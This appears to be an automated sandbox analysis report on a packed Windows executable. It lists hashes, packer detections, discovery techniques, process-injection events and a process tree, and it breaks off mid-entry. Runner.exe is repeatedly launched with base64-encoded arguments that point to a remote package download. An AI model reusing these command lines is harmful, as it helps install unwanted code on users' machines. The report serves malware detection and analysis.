23c48717d3d09e0ed3c5903bb7fcccc81402f7b78b7f19fffa53e497e466a8b8

Analysis

max time kernel
126s
max time network
129s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
20/05/2024, 18:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
Size

1.8MB
MD5

60759f43f640fb1caf0baf142fd8be9a
SHA1

0ed38c5a57c695353eae28fd407eba92c95dc074
SHA256

23c48717d3d09e0ed3c5903bb7fcccc81402f7b78b7f19fffa53e497e466a8b8
SHA512

703e436e6d0a9bed455c1e78855f937ad99ebaf6a53b63a32890165ef61ac2ca22a233113b2db911bf672bf27da08bf5f75f7424dcd96660a5cd029203af45ab
SSDEEP

24576:prMMGKDlavjUEQElhcjUuS+kQ0LaSA8o19MNMeE5GKSL1hCGjOFCYzfCADRXriJG:prMMZlavoRkQb8CuMebPbNYR2iuKP

Score

7^/10

upx

Malware Config

Signatures

ACProtect 1.3x - 1.4x DLL software 6 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x0006000000015fa6-32.dat	acprotect
behavioral1/memory/2644-69-0x0000000002870000-0x000000000287A000-memory.dmp	acprotect
behavioral1/memory/2644-59-0x0000000002870000-0x000000000287A000-memory.dmp	acprotect
behavioral1/memory/2644-52-0x0000000002870000-0x000000000287A000-memory.dmp	acprotect
behavioral1/memory/2644-50-0x0000000002870000-0x000000000287A000-memory.dmp	acprotect
behavioral1/memory/2644-77-0x0000000002870000-0x000000000287A000-memory.dmp	acprotect

Executes dropped EXE 64 IoCs

pid	Process
2592	RtHelp.exe
2668	RtHelp.exe
2272	Runner.exe
1968	Runner.exe
2348	Runner.exe
1420	Runner.exe
1196	Runner.exe
2920	Runner.exe
2972	Runner.exe
1308	Runner.exe
1696	Runner.exe
2952	Runner.exe
2132	Runner.exe
1964	Runner.exe
1548	Runner.exe
2556	Runner.exe
3060	Runner.exe
2696	Runner.exe
2116	Runner.exe
344	Runner.exe
2844	Runner.exe
2764	Runner.exe
2660	Runner.exe
2260	Runner.exe
1872	Runner.exe
2204	Runner.exe
2188	Runner.exe
324	Runner.exe
1120	Runner.exe
1500	Runner.exe
1976	Runner.exe
412	Runner.exe
2944	Runner.exe
1804	Runner.exe
1580	Runner.exe
2172	Runner.exe
1948	Runner.exe
1676	Runner.exe
2724	Runner.exe
2500	Runner.exe
2412	Runner.exe
2432	Runner.exe
2356	Runner.exe
2680	Runner.exe
1032	Runner.exe
1468	Runner.exe
1260	Runner.exe
2044	Runner.exe
1056	Runner.exe
2104	Runner.exe
800	Runner.exe
956	Runner.exe
1796	Runner.exe
2988	Runner.exe
1684	Runner.exe
1716	Runner.exe
2100	Runner.exe
1696	Runner.exe
2096	Runner.exe
1536	Runner.exe
2572	Runner.exe
2568	Runner.exe
2708	Runner.exe
2628	Runner.exe

Loads dropped DLL 64 IoCs

pid	Process
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2592	RtHelp.exe
2592	RtHelp.exe
2592	RtHelp.exe
2592	RtHelp.exe
2592	RtHelp.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2668	RtHelp.exe
2668	RtHelp.exe
2668	RtHelp.exe
2668	RtHelp.exe
2668	RtHelp.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2272	Runner.exe
2272	Runner.exe
2272	Runner.exe
2272	Runner.exe
2272	Runner.exe
1968	Runner.exe
1968	Runner.exe
1968	Runner.exe
1968	Runner.exe
1968	Runner.exe
2348	Runner.exe
2348	Runner.exe
2348	Runner.exe
2348	Runner.exe
2348	Runner.exe
1420	Runner.exe
1420	Runner.exe
1420	Runner.exe
1420	Runner.exe
1420	Runner.exe
1196	Runner.exe
1196	Runner.exe
1196	Runner.exe
1196	Runner.exe
1196	Runner.exe
2920	Runner.exe
2920	Runner.exe
2920	Runner.exe
2920	Runner.exe
2920	Runner.exe
2972	Runner.exe
2972	Runner.exe
2972	Runner.exe
2972	Runner.exe
2972	Runner.exe
1308	Runner.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000015fa6-32.dat	upx
behavioral1/memory/2644-69-0x0000000002870000-0x000000000287A000-memory.dmp	upx
behavioral1/memory/2644-59-0x0000000002870000-0x000000000287A000-memory.dmp	upx
behavioral1/memory/2644-52-0x0000000002870000-0x000000000287A000-memory.dmp	upx
behavioral1/memory/2644-50-0x0000000002870000-0x000000000287A000-memory.dmp	upx
behavioral1/memory/2644-77-0x0000000002870000-0x000000000287A000-memory.dmp	upx

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	RtHelp.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	RtHelp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2644 wrote to memory of 2592	2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe	28
PID 2644 wrote to memory of 2592	2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe	28
PID 2644 wrote to memory of 2592	2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe	28
PID 2644 wrote to memory of 2592	2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe	28
PID 2644 wrote to memory of 2668	2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe	29
PID 2644 wrote to memory of 2668	2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe	29
PID 2644 wrote to memory of 2668	2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe	29
PID 2644 wrote to memory of 2668	2644	60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe	29
PID 1368 wrote to memory of 2272	1368	taskeng.exe	32
PID 1368 wrote to memory of 2272	1368	taskeng.exe	32
PID 1368 wrote to memory of 2272	1368	taskeng.exe	32
PID 1368 wrote to memory of 2272	1368	taskeng.exe	32
PID 2272 wrote to memory of 1968	2272	Runner.exe	33
PID 2272 wrote to memory of 1968	2272	Runner.exe	33
PID 2272 wrote to memory of 1968	2272	Runner.exe	33
PID 2272 wrote to memory of 1968	2272	Runner.exe	33
PID 2272 wrote to memory of 2348	2272	Runner.exe	34
PID 2272 wrote to memory of 2348	2272	Runner.exe	34
PID 2272 wrote to memory of 2348	2272	Runner.exe	34
PID 2272 wrote to memory of 2348	2272	Runner.exe	34
PID 2272 wrote to memory of 1420	2272	Runner.exe	35
PID 2272 wrote to memory of 1420	2272	Runner.exe	35
PID 2272 wrote to memory of 1420	2272	Runner.exe	35
PID 2272 wrote to memory of 1420	2272	Runner.exe	35
PID 2272 wrote to memory of 1196	2272	Runner.exe	36
PID 2272 wrote to memory of 1196	2272	Runner.exe	36
PID 2272 wrote to memory of 1196	2272	Runner.exe	36
PID 2272 wrote to memory of 1196	2272	Runner.exe	36
PID 2272 wrote to memory of 2920	2272	Runner.exe	37
PID 2272 wrote to memory of 2920	2272	Runner.exe	37
PID 2272 wrote to memory of 2920	2272	Runner.exe	37
PID 2272 wrote to memory of 2920	2272	Runner.exe	37
PID 2272 wrote to memory of 2972	2272	Runner.exe	38
PID 2272 wrote to memory of 2972	2272	Runner.exe	38
PID 2272 wrote to memory of 2972	2272	Runner.exe	38
PID 2272 wrote to memory of 2972	2272	Runner.exe	38
PID 2272 wrote to memory of 1308	2272	Runner.exe	39
PID 2272 wrote to memory of 1308	2272	Runner.exe	39
PID 2272 wrote to memory of 1308	2272	Runner.exe	39
PID 2272 wrote to memory of 1308	2272	Runner.exe	39
PID 2272 wrote to memory of 1696	2272	Runner.exe	40
PID 2272 wrote to memory of 1696	2272	Runner.exe	40
PID 2272 wrote to memory of 1696	2272	Runner.exe	40
PID 2272 wrote to memory of 1696	2272	Runner.exe	40
PID 2272 wrote to memory of 2952	2272	Runner.exe	41
PID 2272 wrote to memory of 2952	2272	Runner.exe	41
PID 2272 wrote to memory of 2952	2272	Runner.exe	41
PID 2272 wrote to memory of 2952	2272	Runner.exe	41
PID 2272 wrote to memory of 2132	2272	Runner.exe	42
PID 2272 wrote to memory of 2132	2272	Runner.exe	42
PID 2272 wrote to memory of 2132	2272	Runner.exe	42
PID 2272 wrote to memory of 2132	2272	Runner.exe	42
PID 2272 wrote to memory of 1964	2272	Runner.exe	43
PID 2272 wrote to memory of 1964	2272	Runner.exe	43
PID 2272 wrote to memory of 1964	2272	Runner.exe	43
PID 2272 wrote to memory of 1964	2272	Runner.exe	43
PID 2272 wrote to memory of 1548	2272	Runner.exe	44
PID 2272 wrote to memory of 1548	2272	Runner.exe	44
PID 2272 wrote to memory of 1548	2272	Runner.exe	44
PID 2272 wrote to memory of 1548	2272	Runner.exe	44
PID 2272 wrote to memory of 2556	2272	Runner.exe	45
PID 2272 wrote to memory of 2556	2272	Runner.exe	45
PID 2272 wrote to memory of 2556	2272	Runner.exe	45
PID 2272 wrote to memory of 2556	2272	Runner.exe	45

C:\Users\Admin\AppData\Local\Temp\60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\60759f43f640fb1caf0baf142fd8be9a_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2644
- C:\Users\Admin\AppData\Local\Temp\A84EADD5-0AB3-E842-B4AF-523FE9E04265\RtHelp.exe
  "C:\Users\Admin\AppData\Local\Temp\A84EADD5-0AB3-E842-B4AF-523FE9E04265\RtHelp.exe" --InstSupp --Supp 602 --Ver 180
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2592
- C:\Users\Admin\AppData\Local\Temp\A84EADD5-0AB3-E842-B4AF-523FE9E04265\RtHelp.exe
  "C:\Users\Admin\AppData\Local\Temp\A84EADD5-0AB3-E842-B4AF-523FE9E04265\RtHelp.exe" --PreCheck 602 --Uid 2F5DE6345C168443AFE5BB148453D9F3 --Ver 180
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Maps connected drives based on registry
  PID:2668
- C:\Users\Admin\AppData\Local\Temp\nsz4E3.tmp
  "C:\Users\Admin\AppData\Local\Temp\nsz4E3.tmp" /S _?=C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823
  2⤵
  PID:900
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --Uninstall
    3⤵
    PID:3056

C:\Windows\system32\taskeng.exe
taskeng.exe {B3050BA2-34D3-4FBB-9614-88011DCF02FC} S-1-5-21-2721934792-624042501-2768869379-1000:BISMIZHX\Admin:S4U:
1⤵
- Suspicious use of WriteProcessMemory
PID:1368
- C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
  C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2272
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1968
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2348
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1420
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1196
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2920
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2972
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1308
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1696
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2952
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2132
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1964
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1548
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2556
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:3060
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2696
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2116
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
